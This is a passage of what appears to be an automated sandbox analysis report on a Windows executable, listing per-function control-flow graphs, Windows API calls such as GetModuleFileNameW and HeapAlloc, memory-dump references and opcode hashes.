844->845 850 7ff6029aabd7 844->850 853 7ff6029aace3-7ff6029aace6 845->853 854 7ff6029aacc8-7ff6029aacde call 7ff6029a4144 call 7ff6029a4124 845->854 855 7ff6029aab83-7ff6029aab8d call 7ff6029a97c8 846->855 847->837 852 7ff6029aab4f-7ff6029aab71 ReadConsoleW 847->852 848->822 856 7ff6029aaae3-7ff6029aaaef 848->856 861 7ff6029aabde-7ff6029aabf3 850->861 863 7ff6029aab92-7ff6029aab9c 852->863 864 7ff6029aab73 GetLastError 852->864 858 7ff6029aab79-7ff6029aab7b call 7ff6029a40b8 853->858 859 7ff6029aacec-7ff6029aacee 853->859 854->846 855->803 856->822 857 7ff6029aaaf1-7ff6029aaaf3 856->857 857->822 867 7ff6029aaaf5-7ff6029aab05 857->867 858->846 859->855 861->855 869 7ff6029aabf5-7ff6029aac00 861->869 863->861 864->858 867->822 874 7ff6029aac02-7ff6029aac1b call 7ff6029aa4f4 869->874 875 7ff6029aac27-7ff6029aac2f 869->875 882 7ff6029aac20-7ff6029aac22 874->882 878 7ff6029aac31-7ff6029aac43 875->878 879 7ff6029aacab-7ff6029aacb8 call 7ff6029aa334 875->879 883 7ff6029aac9e-7ff6029aaca6 878->883 884 7ff6029aac45 878->884 879->882 882->855 883->855 886 7ff6029aac4a-7ff6029aac51 884->886 887 7ff6029aac53-7ff6029aac57 886->887 888 7ff6029aac8d-7ff6029aac98 886->888 889 7ff6029aac73 887->889 890 7ff6029aac59-7ff6029aac60 887->890 888->883 892 7ff6029aac79-7ff6029aac89 889->892 890->889 891 7ff6029aac62-7ff6029aac66 890->891 891->889 893 7ff6029aac68-7ff6029aac71 891->893 892->886 894 7ff6029aac8b 892->894 893->892 894->883
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: f9f1d8c6891065138986491ff2aa58718a46430ac594eb4ee1f1e3f26694079b
                                                                                                                                                                                                                            • Instruction ID: f51ee67aa6c762cfbae7636ece9a8f3a904258eae2979416ddc5c1b84ab09d76
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9f1d8c6891065138986491ff2aa58718a46430ac594eb4ee1f1e3f26694079b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7C1BC22E0878692EB619B1694402BD3FB1EF91B98F754135DA4E87793CEFCE845C380
                                                                                                                                                                                                                            Function 00007FF6029933E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF602993534), ref: 00007FF602993411
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029929E0: GetLastError.KERNEL32(?,?,?,00007FF60299342E,?,00007FF602993534), ref: 00007FF602992A14
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029929E0: FormatMessageW.KERNEL32(?,?,?,00007FF60299342E), ref: 00007FF602992A7D
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029929E0: MessageBoxW.USER32 ref: 00007FF602992ACF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                            • API String ID: 517058245-2863816727
                                                                                                                                                                                                                            • Opcode ID: 1891cfa551e3e280dc1046c601286eed7625d1f5967d42fe977e657d1173ede6
                                                                                                                                                                                                                            • Instruction ID: 0f5ce0ec48920a8e929dbf8d3c85f2ba0b632e84da81b70d54949d1742280080
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1891cfa551e3e280dc1046c601286eed7625d1f5967d42fe977e657d1173ede6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E321B210F1854258FA21DB2AE8113BA1B50FF493ACFA00136DA5DC25D7EEACE514C304
                                                                                                                                                                                                                            Function 00007FF6029AE80C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 1072 7ff6029ae80c-7ff6029ae848 1073 7ff6029ae9fe-7ff6029aea09 call 7ff6029a4144 1072->1073 1074 7ff6029ae84e-7ff6029ae857 1072->1074 1080 7ff6029aea0d-7ff6029aea29 call 7ff60299b5c0 1073->1080 1074->1073 1075 7ff6029ae85d-7ff6029ae866 1074->1075 1075->1073 1077 7ff6029ae86c-7ff6029ae86f 1075->1077 1077->1073 1079 7ff6029ae875-7ff6029ae886 1077->1079 1081 7ff6029ae8b0-7ff6029ae8b4 1079->1081 1082 7ff6029ae888-7ff6029ae891 call 7ff6029ae7b0 1079->1082 1081->1073 1084 7ff6029ae8ba-7ff6029ae8be 1081->1084 1082->1073 1090 7ff6029ae897-7ff6029ae89a 1082->1090 1084->1073 1087 7ff6029ae8c4-7ff6029ae8c8 1084->1087 1087->1073 1089 7ff6029ae8ce-7ff6029ae8de call 7ff6029ae7b0 1087->1089 1095 7ff6029ae8e0-7ff6029ae8e3 1089->1095 1096 7ff6029ae8e7 call 7ff6029b5014 1089->1096 1090->1073 1092 7ff6029ae8a0-7ff6029ae8a3 1090->1092 1092->1073 1094 7ff6029ae8a9 1092->1094 1094->1081 1095->1096 1097 7ff6029ae8e5 1095->1097 1099 7ff6029ae8ec-7ff6029ae903 call 7ff6029b4418 1096->1099 1097->1096 1102 7ff6029ae909-7ff6029ae914 call 7ff6029b4448 1099->1102 1103 7ff6029aea2a-7ff6029aea3f call 7ff6029a9780 1099->1103 1102->1103 1108 7ff6029ae91a-7ff6029ae925 call 7ff6029b4478 1102->1108 1108->1103 1111 7ff6029ae92b-7ff6029ae9bf 1108->1111 1112 7ff6029ae9c1-7ff6029ae9dd 1111->1112 1113 7ff6029ae9f9-7ff6029ae9fc 1111->1113 1114 7ff6029ae9df-7ff6029ae9e3 1112->1114 1115 7ff6029ae9f4-7ff6029ae9f7 1112->1115 1113->1080 1114->1115 1116 7ff6029ae9e5-7ff6029ae9f0 call 7ff6029b5058 1114->1116 1115->1080 1116->1115
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                                                            • Opcode ID: acc2441ddfc9c90ddfb51036671ee4d6f67e933df1a1bba6a91abe4f76e3936c
                                                                                                                                                                                                                            • Instruction ID: ef94e0869995d0b8848c8d20d7a2e67da1742836735180c176e8ccfe59b18c28
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: acc2441ddfc9c90ddfb51036671ee4d6f67e933df1a1bba6a91abe4f76e3936c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E751E372F047118AFB14CF2AD9556BC2BA1BF5036CF604235EE5E92AE6DF78A4028740
                                                                                                                                                                                                                            Function 00007FF6029A47DC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                                            • Opcode ID: bc17293da209965c32b68d9e01c100981e0df9d73fb9666d34f13de776241312
                                                                                                                                                                                                                            • Instruction ID: 7f5c91999750d50c4934fd7ca13de7cf3835f22f201a04d27d49890afc744921
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc17293da209965c32b68d9e01c100981e0df9d73fb9666d34f13de776241312
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12517C22E087818AFB50DF76D4513BD2BA1BF88B5CF30A135DE499768ADFB8D4518381
                                                                                                                                                                                                                            Function 00007FF6029A4688 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                                                                                            • Opcode ID: 0008bce29e6a7ea5a7bea1dab7c6bfd996e360174adfa5d32bd81f8338427ad4
                                                                                                                                                                                                                            • Instruction ID: 350b7baf356bd5904bfc1c9687715fd033cad1a8c964c6157f6dabe69d21c040
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0008bce29e6a7ea5a7bea1dab7c6bfd996e360174adfa5d32bd81f8338427ad4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB419522D1878183E7508B62D5503797AA0FF95768F20A334E65C87AD2DFFCA5E08780
                                                                                                                                                                                                                            Function 00007FF60299BCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3251591375-0
                                                                                                                                                                                                                            • Opcode ID: 7209dc663bbfaa75001d9845d7b1af01743ff14c1cf771d7fb5f586bdd48a898
                                                                                                                                                                                                                            • Instruction ID: b7b9356ad5a55b928777e94a0a17de5c20705d3763f0d0dde715089fcd499a0c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7209dc663bbfaa75001d9845d7b1af01743ff14c1cf771d7fb5f586bdd48a898
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17317C61E0C20359FA24EB6FE8253B92B91EF8536CF744435DA4DC72D3CEACA4248655
                                                                                                                                                                                                                            Function 00007FFE00735780 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00007FFE0073E160: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FFE0076B3D9,?,?,00000000,00007FFE0076F2D3,?,?,?,?,00007FFE0076F264), ref: 00007FFE0073E1A7
                                                                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00000000,00007FFE00734DF6), ref: 00007FFE0076D321
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877342060.00007FFE00731000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFE00730000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877321758.00007FFE00730000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877476367.00007FFE007DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877524588.00007FFE00814000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877547774.00007FFE00817000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe00730000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocCountCriticalHeapInitializeSectionSpin
                                                                                                                                                                                                                            • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                                                            • API String ID: 2225649465-3084827643
                                                                                                                                                                                                                            • Opcode ID: 30ea1fc3e054e6cd9632384160c28d24efbea9d124835a4ef695d356195005c8
                                                                                                                                                                                                                            • Instruction ID: dfc473e138206ce691ec57cb74b2605f4b11903a95e5c67a91b3e6a55d0def85
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30ea1fc3e054e6cd9632384160c28d24efbea9d124835a4ef695d356195005c8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0121A122B1AB8296E721AF11E5001AD77A0FB49750F9C4635DB9E17BE8DF3CE526C700
                                                                                                                                                                                                                            Function 00007FF60299F1AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: 0fc6784433214cadb513cda23888d6e2df11297403258245e6b8b865de30b847
                                                                                                                                                                                                                            • Instruction ID: 998075c39b645b2ba98ab7247dbb11e5454c8815537b76ca234d5d851e161d4d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0fc6784433214cadb513cda23888d6e2df11297403258245e6b8b865de30b847
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7951B561B092424AFB649A2B940167AAA91FF44BBCF344635DE6DC7BC7CFBCE4118640
                                                                                                                                                                                                                            Function 00007FF6029AAFB4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                            • Opcode ID: f023d18367858f18f4ffc712da8a58e22864b16336d0f87c2cad14ba99512c22
                                                                                                                                                                                                                            • Instruction ID: ed8095bd25b491aed934fdcb7a8c0b8e932c7821cba3110966821639a74f91ce
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f023d18367858f18f4ffc712da8a58e22864b16336d0f87c2cad14ba99512c22
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8411B262B08B9181DB208B26A44416DBB61BF45BF8F640331EA7D877DACFBCD4518780
                                                                                                                                                                                                                            Function 00007FF6029A4984 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029A4899), ref: 00007FF6029A49B7
                                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029A4899), ref: 00007FF6029A49CD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                                                                                            • Opcode ID: ceb5b27e1429273ec0f7cd93d37e8177472f7336ef6eaae4f88032c19ae1003e
                                                                                                                                                                                                                            • Instruction ID: 4ee5baf10f4dbfd2d12e3964e968c7271cfeaf7a6e633013ad6840531a036a10
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ceb5b27e1429273ec0f7cd93d37e8177472f7336ef6eaae4f88032c19ae1003e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B119132A0C74282EB548B16E41103ABB60FF84B69F701235E69EC19D9EFACD054DB40
                                                                                                                                                                                                                            Function 00007FF6029A99D8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,00007FF6029A9855,?,?,00000000,00007FF6029A990A), ref: 00007FF6029A9A46
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6029A9855,?,?,00000000,00007FF6029A990A), ref: 00007FF6029A9A50
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 918212764-0
                                                                                                                                                                                                                            • Opcode ID: 137615f181f8dfd138897848f1ccea2caa8bc1983952df4cf4225e009fac3311
                                                                                                                                                                                                                            • Instruction ID: 79c5a3a18abf57b1e96ba64f7831baa2bad8bd9448e0ecc91dfeb0959f6ab3d9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 137615f181f8dfd138897848f1ccea2caa8bc1983952df4cf4225e009fac3311
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6921D111F0878200FF90976695812BD6E92BF857A8F241235DA2EC73C7CEECE4408380
                                                                                                                                                                                                                            Function 00007FFE0073E160 Relevance: 2.5, APIs: 2, Instructions: 46memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FFE0076B3D9,?,?,00000000,00007FFE0076F2D3,?,?,?,?,00007FFE0076F264), ref: 00007FFE0073E1A7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877342060.00007FFE00731000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFE00730000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877321758.00007FFE00730000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877476367.00007FFE007DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877524588.00007FFE00814000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877547774.00007FFE00817000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe00730000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                            • Opcode ID: 53a1758bed9b8d8a2c520d86e96a971fc7ec69c5e2c9ac35d9161c00ec70059d
                                                                                                                                                                                                                            • Instruction ID: 1d036cbe0e1c7dd9dfce1052bb65bb1ec9ce024f7cd0286ba857654625e41391
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53a1758bed9b8d8a2c520d86e96a971fc7ec69c5e2c9ac35d9161c00ec70059d
